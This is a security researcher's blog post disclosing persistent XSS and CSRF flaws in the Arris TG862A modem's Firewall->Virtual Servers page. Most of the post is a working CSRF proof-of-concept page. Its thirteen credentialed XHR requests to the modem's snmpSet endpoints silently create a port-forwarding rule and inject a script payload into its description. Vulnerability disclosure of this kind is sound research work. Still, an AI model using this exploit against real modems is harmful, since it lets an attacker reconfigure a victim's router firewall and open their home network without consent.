m0nad's Blog

Just another WordPress.com site

Persistent XSS and CSRF in TG862A Arris Modem

leave a comment »

Continue with the bugs founded by me on the Arris Modem Series, the TG862A(TS0705125D_031115_MODEL_862_GW) Arris Modem have some obvious persistent XSS and CSRF bugs , in the ‘Firewall’ area.

In the  Firewall->Virtual Servers section
firewall-area

We can add a new ‘Virtual Server’
add-virtual-serv

And put the malicious Javascript code on the “Description” field
add-virtual-server-xss

After click on the button for add a new virtual server, this make the requests to create a new virtual server and when the “virtual server” page with malicious Javascript is called, shows the alert pop-up
xss-popup

The application don’t have any kind of protection to prevent CSRF attacks and the code used for PoC is below. 😉

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.5.12;&_n=26020&_=1448050502692", true);
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <script>
      function submitRequest2()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpGet?oids=1.3.6.1.4.1.4115.1.20.1.1.2.2.1.3.12;&_n=26020&_=1448050509837", true);
        xhr.setRequestHeader("Accept", "text/plain, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest2();
    </script>
    <script>

      function submitRequest3()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=5;2;&_n=26020&_=1448050512017", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest3();
    </script>
    <script>
      function submitRequest4()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.2.1=test%3Cscript%3Ealert(1)%3C%2Fscript%3E;4;&_n=26020&_=1448050516100", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest4();
    </script>
    <script>
      function submitRequest5()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.3.1=666;66;&_n=26020&_=1448050518619", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest5();
    </script>
    <script>
      function submitRequest6()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.4.1=666;66;&_n=26020&_=1448050530861", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest6();
    </script>
    <script>
      function submitRequest7()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.5.1=1;2;&_n=26020&_=1448050533971", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest7();
    </script>
    <script>
      function submitRequest8()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.6.1=1;2;&_n=26020&_=1448050539233", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest8();
    </script>
    <script>
      function submitRequest9()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.7.1=%24C0A8000A;4;&_n=26020&_=1448050545672", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest9();
    </script>
    <script>
      function submitRequest10()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.9.1=666;66;&_n=26020&_=1448050550616", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest10();
    </script>
    <script>
      function submitRequest11()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.10.1=666;66;&_n=26020&_=1448050556630", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest11();
    </script>
    <script>
      function submitRequest12()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.4.12.1.11.1=1;2;&_n=26020&_=1448050559849", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest12();
    </script>
    <script>
      function submitRequest13()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "http://192.168.0.1/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.9.0=1;2;&_n=26020&_=1448050563269", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.withCredentials = true;
        var body = "";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest13();
    </script>
  </body>
</html>

Regards.

update: Vulnerabilities still in TS0705125E_111615_MODEL_862_GW

Anúncios

Written by m0nad

novembro 20, 2015 às 9:29 pm

Publicado em Uncategorized

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s

%d blogueiros gostam disto: